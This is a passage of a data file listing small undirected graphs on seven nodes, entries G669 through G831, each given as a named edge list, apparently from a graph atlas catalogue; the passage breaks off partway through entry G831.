['edgelist',
'G669',
7,
[[4, 3],
[7, 4],
[6, 7],
[1, 6],
[3, 1],
[6, 3],
[2, 6],
[3, 2],
[5, 3],
[6, 5]]],
['edgelist',
'G670',
7,
[[3, 1],
[2, 3],
[4, 2],
[1, 4],
[7, 1],
[2, 7],
[6, 2],
[1, 6],
[5, 1],
[2, 5]]],
['edgelist',
'G671',
7,
[[7, 5],
[2, 3],
[7, 6],
[4, 5],
[5, 6],
[1, 6],
[7, 1],
[7, 2],
[7, 3],
[7, 4]]],
['edgelist',
'G672',
7,
[[1, 2],
[7, 6],
[3, 4],
[4, 5],
[7, 5],
[1, 6],
[7, 1],
[7, 2],
[7, 3],
[7, 4]]],
['edgelist',
'G673',
7,
[[1, 2],
[3, 1],
[4, 3],
[5, 4],
[2, 5],
[3, 2],
[1, 6],
[6, 3],
[7, 2],
[3, 7]]],
['edgelist',
'G674',
7,
[[1, 2],
[3, 1],
[4, 3],
[5, 4],
[2, 5],
[3, 2],
[6, 1],
[6, 3],
[7, 3],
[1, 7]]],
['edgelist',
'G675',
7,
[[7, 5],
[2, 3],
[7, 6],
[4, 5],
[5, 6],
[1, 6],
[7, 4],
[7, 2],
[7, 3],
[1, 5]]],
['edgelist',
'G676',
7,
[[2, 1],
[3, 2],
[1, 3],
[4, 3],
[5, 4],
[3, 5],
[6, 3],
[5, 6],
[7, 5],
[2, 7]]],
['edgelist',
'G677',
7,
[[1, 2],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[3, 6],
[3, 7]]],
['edgelist',
'G678',
7,
[[1, 3],
[6, 1],
[5, 6],
[3, 5],
[2, 3],
[6, 2],
[7, 6],
[4, 7],
[3, 4],
[3, 7]]],
['edgelist',
'G679',
7,
[[1, 2],
[3, 1],
[4, 3],
[5, 4],
[2, 5],
[3, 2],
[6, 2],
[1, 6],
[7, 1],
[3, 7]]],
['edgelist',
'G680',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[7, 3],
[7, 5],
[1, 3],
[5, 1]]],
['edgelist',
'G681',
7,
[[1, 5],
[4, 1],
[3, 4],
[6, 3],
[7, 6],
[3, 7],
[5, 3],
[2, 5],
[4, 2],
[5, 4]]],
['edgelist',
'G682',
7,
[[2, 7],
[3, 2],
[1, 3],
[2, 1],
[5, 2],
[4, 5],
[3, 4],
[6, 7],
[5, 6],
[4, 2]]],
['edgelist',
'G683',
7,
[[7, 6],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[7, 1],
[7, 2],
[7, 3],
[7, 5]]],
['edgelist',
'G684',
7,
[[1, 2],
[7, 6],
[3, 4],
[4, 5],
[7, 5],
[1, 6],
[7, 1],
[7, 2],
[7, 3],
[6, 4]]],
['edgelist',
'G685',
7,
[[1, 2],
[2, 3],
[3, 4],
[6, 5],
[1, 5],
[6, 1],
[6, 4],
[6, 3],
[7, 6],
[7, 2]]],
['edgelist',
'G686',
7,
[[1, 4],
[3, 1],
[2, 3],
[4, 2],
[5, 4],
[3, 5],
[1, 5],
[7, 1],
[6, 7],
[1, 6]]],
['edgelist',
'G687',
7,
[[1, 4],
[3, 1],
[2, 3],
[4, 2],
[5, 4],
[1, 6],
[1, 5],
[7, 1],
[6, 7],
[2, 5]]],
['edgelist',
'G688',
7,
[[1, 2],
[7, 6],
[3, 4],
[4, 5],
[7, 5],
[1, 6],
[7, 1],
[7, 2],
[7, 3],
[5, 3]]],
['edgelist',
'G689',
7,
[[2, 3],
[6, 2],
[7, 6],
[3, 7],
[2, 7],
[6, 3],
[5, 2],
[1, 5],
[4, 1],
[2, 4]]],
['edgelist',
'G690',
7,
[[5, 3],
[7, 3],
[6, 4],
[5, 2],
[3, 1],
[7, 4],
[6, 3],
[1, 2],
[1, 5],
[7, 1]]],
['edgelist',
'G691',
7,
[[5, 3],
[4, 7],
[6, 4],
[6, 2],
[3, 1],
[7, 1],
[6, 3],
[2, 5],
[1, 5],
[6, 5]]],
['edgelist',
'G692',
7,
[[5, 1],
[6, 5],
[5, 2],
[3, 2],
[4, 3],
[1, 4],
[4, 5],
[6, 4],
[7, 2],
[7, 6]]],
['edgelist',
'G693',
7,
[[1, 5],
[2, 1],
[3, 2],
[5, 3],
[4, 5],
[6, 4],
[5, 6],
[6, 3],
[7, 4],
[3, 7]]],
['edgelist',
'G694',
7,
[[2, 7],
[3, 2],
[1, 3],
[2, 1],
[5, 2],
[4, 5],
[3, 4],
[6, 7],
[5, 6],
[5, 7]]],
['edgelist',
'G695',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[7, 4],
[7, 2],
[7, 6],
[6, 2]]],
['edgelist',
'G696',
7,
[[2, 1],
[5, 2],
[1, 5],
[3, 1],
[4, 3],
[7, 4],
[6, 7],
[1, 6],
[6, 3],
[7, 3]]],
['edgelist',
'G697',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[6, 4],
[6, 2],
[6, 5],
[7, 2],
[6, 7]]],
['edgelist',
'G698',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[3, 5],
[5, 2],
[7, 2],
[7, 6]]],
['edgelist',
'G699',
7,
[[1, 2],
[3, 1],
[4, 3],
[5, 4],
[2, 5],
[3, 2],
[6, 4],
[3, 6],
[7, 2],
[5, 7]]],
['edgelist',
'G700',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[6, 3],
[6, 5],
[7, 6],
[7, 1],
[1, 3]]],
['edgelist',
'G701',
7,
[[3, 1],
[6, 3],
[2, 6],
[1, 2],
[4, 1],
[6, 4],
[7, 6],
[5, 7],
[1, 5],
[5, 4]]],
['edgelist',
'G702',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[5, 3],
[2, 6],
[7, 3],
[7, 6]]],
['edgelist',
'G703',
7,
[[6, 1],
[7, 6],
[3, 7],
[4, 3],
[1, 4],
[5, 1],
[3, 5],
[5, 4],
[2, 5],
[4, 2]]],
['edgelist',
'G704',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[7, 4],
[6, 7],
[4, 6],
[5, 6],
[5, 7]]],
['edgelist',
'G705',
7,
[[6, 3],
[3, 2],
[4, 3],
[5, 4],
[2, 5],
[6, 1],
[7, 2],
[7, 1],
[2, 6],
[3, 7]]],
['edgelist',
'G706',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[7, 3],
[7, 5],
[5, 3],
[6, 2]]],
['edgelist',
'G707',
7,
[[5, 3],
[3, 4],
[5, 2],
[1, 2],
[4, 1],
[7, 5],
[1, 7],
[6, 1],
[5, 6],
[2, 6]]],
['edgelist',
'G708',
7,
[[3, 2],
[6, 3],
[4, 6],
[1, 4],
[5, 1],
[7, 5],
[4, 7],
[2, 4],
[5, 2],
[6, 5]]],
['edgelist',
'G709',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[6, 1],
[6, 2],
[6, 3],
[7, 6],
[7, 4]]],
['edgelist',
'G710',
7,
[[1, 2],
[5, 1],
[2, 5],
[3, 2],
[6, 3],
[5, 6],
[7, 6],
[4, 7],
[3, 4],
[6, 4]]],
['edgelist',
'G711',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[7, 6],
[7, 2],
[7, 3],
[5, 3]]],
['edgelist',
'G712',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[6, 1],
[6, 4],
[6, 3],
[7, 6],
[7, 5]]],
['edgelist',
'G713',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[7, 1],
[7, 4],
[7, 3],
[5, 1]]],
['edgelist',
'G714',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[7, 1],
[7, 5],
[7, 6],
[7, 4]]],
['edgelist',
'G715',
7,
[[1, 6],
[7, 1],
[2, 7],
[1, 2],
[2, 6],
[3, 2],
[4, 3],
[5, 4],
[7, 5],
[5, 6]]],
['edgelist',
'G716',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[7, 1],
[7, 6],
[7, 5],
[3, 1]]],
['edgelist',
'G717',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[7, 1],
[7, 2],
[7, 6],
[7, 4]]],
['edgelist',
'G718',
7,
[[3, 2],
[3, 1],
[4, 3],
[5, 4],
[2, 5],
[6, 2],
[6, 1],
[7, 1],
[2, 7],
[7, 6]]],
['edgelist',
'G719',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[6, 4],
[6, 2],
[7, 2],
[7, 5],
[7, 6]]],
['edgelist',
'G720',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[6, 3],
[5, 2],
[7, 1],
[6, 7]]],
['edgelist',
'G721',
7,
[[4, 2],
[1, 4],
[6, 1],
[2, 6],
[3, 2],
[7, 3],
[1, 7],
[1, 5],
[5, 3],
[5, 7]]],
['edgelist',
'G722',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[7, 5],
[7, 2],
[7, 3],
[7, 6]]],
['edgelist',
'G723',
7,
[[1, 4],
[3, 1],
[2, 3],
[4, 2],
[5, 4],
[3, 5],
[6, 5],
[6, 1],
[7, 5],
[7, 2]]],
['edgelist',
'G724',
7,
[[1, 2],
[7, 6],
[3, 4],
[4, 5],
[7, 5],
[1, 6],
[7, 3],
[7, 2],
[5, 3],
[6, 2]]],
['edgelist',
'G725',
7,
[[6, 3],
[7, 6],
[3, 7],
[5, 3],
[1, 5],
[4, 1],
[3, 4],
[2, 1],
[2, 4],
[5, 2]]],
['edgelist',
'G726',
7,
[[4, 5],
[2, 4],
[5, 2],
[1, 5],
[4, 1],
[2, 1],
[3, 2],
[6, 3],
[7, 6],
[3, 7]]],
['edgelist',
'G727',
7,
[[6, 7],
[3, 6],
[7, 3],
[4, 7],
[1, 4],
[5, 1],
[6, 5],
[2, 5],
[4, 2],
[3, 2]]],
['edgelist',
'G728',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[7, 1],
[7, 2],
[7, 6],
[5, 3]]],
['edgelist',
'G729',
7,
[[2, 1],
[3, 2],
[4, 3],
[1, 4],
[6, 1],
[2, 6],
[5, 6],
[7, 5],
[4, 7],
[3, 7]]],
['edgelist',
'G730',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[5, 2],
[3, 6],
[7, 1],
[4, 7]]],
['edgelist',
'G731',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[1, 3],
[2, 6]]],
['edgelist',
'G732',
7,
[[1, 2],
[3, 5],
[1, 3],
[3, 2],
[4, 2],
[4, 3],
[5, 2],
[6, 2],
[6, 3],
[6, 4],
[1, 4]]],
['edgelist',
'G733',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[6, 1],
[5, 6]]],
['edgelist',
'G734',
7,
[[1, 2],
[2, 3],
[3, 4],
[5, 6],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[6, 4],
[1, 3]]],
['edgelist',
'G735',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[6, 4],
[3, 6],
[2, 1],
[5, 2],
[6, 2]]],
['edgelist',
'G736',
7,
[[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 6],
[3, 7],
[4, 5],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G737',
7,
[[4, 7],
[2, 4],
[3, 2],
[1, 3],
[6, 1],
[7, 6],
[3, 7],
[6, 2],
[1, 4],
[2, 7],
[1, 2]]],
['edgelist',
'G738',
7,
[[2, 6],
[5, 2],
[1, 5],
[6, 1],
[3, 6],
[5, 3],
[4, 5],
[6, 4],
[1, 2],
[3, 1],
[4, 3]]],
['edgelist',
'G739',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[3, 5],
[6, 3],
[2, 6],
[2, 5],
[1, 4]]],
['edgelist',
'G740',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[6, 5],
[7, 5]]],
['edgelist',
'G741',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[6, 4],
[7, 5]]],
['edgelist',
'G742',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[6, 3],
[5, 7]]],
['edgelist',
'G743',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[3, 6],
[7, 3]]],
['edgelist',
'G744',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[6, 3],
[1, 7]]],
['edgelist',
'G745',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[2, 3],
[2, 4],
[2, 5],
[3, 4],
[3, 5],
[4, 5],
[7, 6]]],
['edgelist',
'G746',
7,
[[2, 6],
[5, 2],
[1, 5],
[6, 1],
[3, 6],
[5, 3],
[4, 5],
[6, 4],
[5, 6],
[2, 1],
[5, 7]]],
['edgelist',
'G747',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[6, 5],
[4, 6],
[2, 6],
[2, 7]]],
['edgelist',
'G748',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[6, 5],
[4, 6],
[2, 6],
[7, 5]]],
['edgelist',
'G749',
7,
[[2, 6],
[5, 2],
[1, 5],
[6, 1],
[3, 6],
[5, 3],
[4, 5],
[6, 4],
[5, 6],
[2, 1],
[2, 7]]],
['edgelist',
'G750',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[4, 3],
[1, 4],
[5, 1],
[3, 5],
[3, 7]]],
['edgelist',
'G751',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[6, 5],
[4, 6],
[2, 6],
[6, 7]]],
['edgelist',
'G752',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[4, 3],
[1, 4],
[3, 5],
[6, 3],
[3, 7]]],
['edgelist',
'G753',
7,
[[2, 1],
[5, 2],
[1, 5],
[6, 1],
[5, 6],
[4, 5],
[2, 4],
[6, 2],
[3, 4],
[2, 3],
[7, 2]]],
['edgelist',
'G754',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[4, 3],
[1, 4],
[3, 5],
[6, 3],
[4, 7]]],
['edgelist',
'G755',
7,
[[2, 1],
[5, 2],
[1, 5],
[6, 1],
[5, 6],
[4, 5],
[2, 4],
[6, 2],
[3, 4],
[2, 3],
[7, 5]]],
['edgelist',
'G756',
7,
[[1, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 6],
[3, 7],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G757',
7,
[[5, 4],
[1, 5],
[2, 1],
[3, 2],
[4, 3],
[1, 6],
[6, 4],
[1, 4],
[2, 6],
[6, 3],
[1, 7]]],
['edgelist',
'G758',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[4, 3],
[1, 4],
[3, 5],
[6, 3],
[1, 7]]],
['edgelist',
'G759',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[3, 6],
[1, 6],
[3, 1],
[6, 2],
[5, 2],
[2, 7]]],
['edgelist',
'G760',
7,
[[2, 1],
[5, 2],
[1, 5],
[6, 1],
[5, 6],
[4, 5],
[2, 4],
[6, 2],
[3, 4],
[2, 3],
[6, 7]]],
['edgelist',
'G761',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[6, 5],
[4, 6],
[2, 6],
[1, 7]]],
['edgelist',
'G762',
7,
[[1, 2],
[3, 5],
[1, 3],
[5, 6],
[4, 2],
[4, 3],
[5, 2],
[6, 2],
[6, 3],
[6, 4],
[3, 7]]],
['edgelist',
'G763',
7,
[[2, 1],
[5, 2],
[1, 5],
[6, 1],
[5, 6],
[4, 5],
[2, 4],
[6, 2],
[3, 4],
[2, 3],
[4, 7]]],
['edgelist',
'G764',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[3, 6],
[1, 6],
[3, 1],
[6, 2],
[5, 2],
[3, 7]]],
['edgelist',
'G765',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[4, 3],
[1, 4],
[3, 5],
[6, 3],
[6, 7]]],
['edgelist',
'G766',
7,
[[5, 4],
[1, 5],
[2, 1],
[3, 2],
[4, 3],
[1, 6],
[6, 4],
[1, 4],
[2, 6],
[6, 3],
[6, 7]]],
['edgelist',
'G767',
7,
[[1, 2],
[3, 5],
[1, 3],
[5, 6],
[4, 2],
[4, 3],
[5, 2],
[6, 2],
[6, 3],
[6, 4],
[6, 7]]],
['edgelist',
'G768',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[6, 5],
[6, 7]]],
['edgelist',
'G769',
7,
[[5, 4],
[1, 5],
[2, 1],
[3, 2],
[4, 3],
[1, 6],
[6, 4],
[1, 4],
[2, 6],
[6, 3],
[2, 7]]],
['edgelist',
'G770',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[3, 6],
[1, 6],
[3, 1],
[6, 2],
[5, 2],
[5, 7]]],
['edgelist',
'G771',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[3, 6],
[1, 6],
[3, 1],
[6, 2],
[5, 2],
[6, 7]]],
['edgelist',
'G772',
7,
[[1, 2],
[3, 5],
[1, 3],
[5, 6],
[4, 2],
[4, 3],
[5, 2],
[6, 2],
[6, 3],
[6, 4],
[5, 7]]],
['edgelist',
'G773',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[4, 3],
[1, 4],
[5, 1],
[3, 5],
[2, 7]]],
['edgelist',
'G774',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[7, 6],
[7, 3]]],
['edgelist',
'G775',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[6, 1],
[6, 2],
[6, 3],
[6, 4],
[6, 5],
[6, 7]]],
['edgelist',
'G776',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[3, 5],
[1, 3],
[2, 4],
[6, 2],
[2, 7]]],
['edgelist',
'G777',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[6, 1],
[6, 2],
[6, 3],
[6, 4],
[6, 5],
[2, 7]]],
['edgelist',
'G778',
7,
[[2, 1],
[5, 2],
[1, 5],
[6, 1],
[5, 6],
[4, 5],
[2, 4],
[6, 2],
[3, 4],
[2, 3],
[3, 7]]],
['edgelist',
'G779',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[4, 3],
[1, 4],
[3, 5],
[6, 3],
[2, 7]]],
['edgelist',
'G780',
7,
[[1, 7],
[2, 5],
[2, 6],
[2, 7],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[6, 7]]],
['edgelist',
'G781',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[5, 2],
[6, 4],
[3, 6],
[2, 1],
[2, 7]]],
['edgelist',
'G782',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[3, 5],
[1, 3],
[2, 4],
[6, 2],
[6, 7]]],
['edgelist',
'G783',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[3, 5],
[1, 3],
[2, 4],
[6, 2],
[7, 4]]],
['edgelist',
'G784',
7,
[[5, 4],
[1, 5],
[2, 1],
[3, 2],
[4, 3],
[1, 6],
[6, 4],
[1, 4],
[2, 6],
[6, 3],
[5, 7]]],
['edgelist',
'G785',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[3, 6],
[1, 6],
[3, 1],
[6, 2],
[5, 2],
[7, 4]]],
['edgelist',
'G786',
7,
[[4, 5],
[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[3, 5],
[6, 2],
[4, 3],
[1, 4],
[2, 7]]],
['edgelist',
'G787',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[5, 2],
[6, 4],
[3, 6],
[2, 1],
[7, 3]]],
['edgelist',
'G788',
7,
[[1, 2],
[3, 5],
[1, 3],
[5, 6],
[4, 2],
[4, 3],
[5, 2],
[6, 2],
[6, 3],
[6, 4],
[1, 7]]],
['edgelist',
'G789',
7,
[[1, 7],
[2, 5],
[2, 6],
[2, 7],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6]]],
['edgelist',
'G790',
7,
[[7, 6],
[1, 7],
[6, 1],
[2, 6],
[7, 2],
[3, 7],
[6, 3],
[4, 6],
[7, 4],
[5, 7],
[6, 5]]],
['edgelist',
'G791',
7,
[[1, 2],
[3, 1],
[4, 3],
[5, 4],
[2, 5],
[3, 2],
[6, 2],
[3, 6],
[7, 3],
[2, 7],
[4, 2]]],
['edgelist',
'G792',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[6, 2],
[4, 6],
[7, 2],
[5, 7],
[2, 5],
[4, 2]]],
['edgelist',
'G793',
7,
[[2, 5],
[3, 4],
[5, 3],
[1, 7],
[5, 6],
[7, 6],
[4, 2],
[7, 5],
[4, 1],
[4, 7],
[5, 4]]],
['edgelist',
'G794',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[5, 3],
[7, 5],
[3, 7],
[6, 3],
[1, 3]]],
['edgelist',
'G795',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[5, 1],
[4, 1],
[3, 1],
[7, 1],
[4, 7]]],
['edgelist',
'G796',
7,
[[1, 2],
[3, 1],
[6, 3],
[7, 6],
[3, 7],
[2, 3],
[5, 2],
[3, 5],
[4, 3],
[5, 4],
[4, 2]]],
['edgelist',
'G797',
7,
[[5, 6],
[2, 5],
[3, 2],
[4, 3],
[7, 4],
[6, 7],
[3, 6],
[5, 3],
[4, 6],
[1, 6],
[3, 1]]],
['edgelist',
'G798',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[5, 3],
[6, 3],
[6, 1],
[7, 3],
[5, 7],
[6, 5]]],
['edgelist',
'G799',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[7, 2],
[3, 7],
[1, 3],
[7, 1],
[6, 3],
[1, 6]]],
['edgelist',
'G800',
7,
[[1, 6],
[7, 1],
[2, 7],
[6, 2],
[3, 6],
[7, 3],
[5, 4],
[4, 3],
[5, 6],
[7, 5],
[7, 6]]],
['edgelist',
'G801',
7,
[[1, 6],
[7, 1],
[2, 7],
[6, 2],
[3, 6],
[7, 3],
[4, 7],
[6, 4],
[5, 6],
[7, 5],
[5, 4]]],
['edgelist',
'G802',
7,
[[1, 6],
[1, 7],
[2, 3],
[2, 7],
[3, 5],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G803',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[1, 3],
[3, 5],
[6, 3],
[5, 6],
[7, 6],
[7, 1]]],
['edgelist',
'G804',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[6, 7],
[1, 7],
[5, 3],
[1, 5],
[3, 1],
[7, 5]]],
['edgelist',
'G805',
7,
[[1, 2],
[3, 1],
[4, 3],
[5, 4],
[2, 5],
[6, 2],
[6, 3],
[7, 2],
[3, 7],
[5, 3],
[6, 5]]],
['edgelist',
'G806',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[6, 2],
[3, 6],
[5, 3],
[7, 3],
[5, 7]]],
['edgelist',
'G807',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[7, 1],
[7, 5],
[7, 3],
[1, 3],
[5, 1]]],
['edgelist',
'G808',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[4, 2],
[6, 4],
[5, 6],
[2, 5],
[7, 6],
[7, 2]]],
['edgelist',
'G809',
7,
[[1, 5],
[4, 1],
[5, 4],
[3, 5],
[4, 3],
[2, 4],
[3, 2],
[5, 2],
[6, 3],
[7, 6],
[3, 7]]],
['edgelist',
'G810',
7,
[[1, 6],
[1, 7],
[2, 5],
[2, 7],
[3, 4],
[3, 6],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7]]],
['edgelist',
'G811',
7,
[[1, 2],
[5, 1],
[6, 5],
[7, 6],
[4, 7],
[3, 4],
[2, 3],
[5, 2],
[3, 5],
[6, 3],
[2, 6]]],
['edgelist',
'G812',
7,
[[1, 5],
[4, 1],
[5, 4],
[3, 5],
[7, 3],
[2, 7],
[6, 2],
[3, 6],
[4, 3],
[2, 4],
[5, 2]]],
['edgelist',
'G813',
7,
[[1, 2],
[7, 6],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[7, 1],
[7, 2],
[7, 3],
[7, 4],
[7, 5]]],
['edgelist',
'G814',
7,
[[5, 2],
[1, 5],
[2, 1],
[4, 2],
[1, 4],
[6, 2],
[7, 6],
[2, 7],
[3, 2],
[6, 3],
[7, 3]]],
['edgelist',
'G815',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 2],
[5, 3],
[5, 4],
[6, 5],
[7, 6],
[5, 7]]],
['edgelist',
'G816',
7,
[[2, 1],
[3, 2],
[4, 3],
[5, 4],
[1, 5],
[3, 1],
[6, 3],
[7, 6],
[4, 7],
[7, 1],
[1, 6]]],
['edgelist',
'G817',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[1, 3],
[5, 1],
[7, 5],
[1, 7],
[4, 7]]],
['edgelist',
'G818',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[3, 1],
[6, 3],
[7, 6],
[5, 7],
[1, 6],
[7, 1]]],
['edgelist',
'G819',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[7, 1],
[3, 7],
[4, 7],
[1, 4],
[5, 1]]],
['edgelist',
'G820',
7,
[[5, 7],
[6, 5],
[7, 6],
[4, 7],
[6, 4],
[3, 6],
[4, 3],
[6, 1],
[7, 1],
[2, 1],
[3, 2]]],
['edgelist',
'G821',
7,
[[3, 1],
[5, 3],
[6, 5],
[4, 6],
[2, 4],
[1, 2],
[3, 2],
[4, 3],
[7, 4],
[6, 7],
[5, 4]]],
['edgelist',
'G822',
7,
[[5, 4],
[5, 3],
[2, 5],
[4, 2],
[1, 4],
[2, 1],
[4, 3],
[4, 6],
[3, 6],
[7, 1],
[5, 7]]],
['edgelist',
'G823',
7,
[[1, 2],
[1, 3],
[3, 4],
[6, 2],
[2, 4],
[6, 3],
[7, 4],
[7, 1],
[6, 4],
[5, 6],
[4, 5]]],
['edgelist',
'G824',
7,
[[5, 1],
[2, 5],
[7, 2],
[1, 7],
[4, 1],
[2, 4],
[6, 2],
[1, 6],
[7, 6],
[3, 4],
[1, 3]]],
['edgelist',
'G825',
7,
[[1, 2],
[6, 1],
[5, 6],
[2, 5],
[3, 2],
[4, 3],
[5, 4],
[5, 3],
[7, 5],
[3, 7],
[4, 7]]],
['edgelist',
'G826',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[6, 2],
[4, 6],
[7, 4],
[5, 7],
[6, 7]]],
['edgelist',
'G827',
7,
[[7, 4],
[6, 7],
[3, 6],
[4, 3],
[6, 4],
[5, 6],
[3, 5],
[2, 3],
[6, 2],
[1, 2],
[5, 1]]],
['edgelist',
'G828',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 2],
[5, 3],
[5, 4],
[6, 2],
[7, 6],
[5, 7]]],
['edgelist',
'G829',
7,
[[1, 5],
[4, 1],
[3, 4],
[6, 3],
[7, 6],
[3, 7],
[5, 3],
[2, 5],
[4, 2],
[2, 1],
[3, 2]]],
['edgelist',
'G830',
7,
[[6, 1],
[1, 2],
[4, 1],
[6, 4],
[3, 6],
[7, 3],
[5, 7],
[6, 5],
[2, 6],
[7, 2],
[4, 7]]],
['edgelist',
'G831',
7,
[[1, 2],
[3, 1],
[4, 3],
[5, 4],
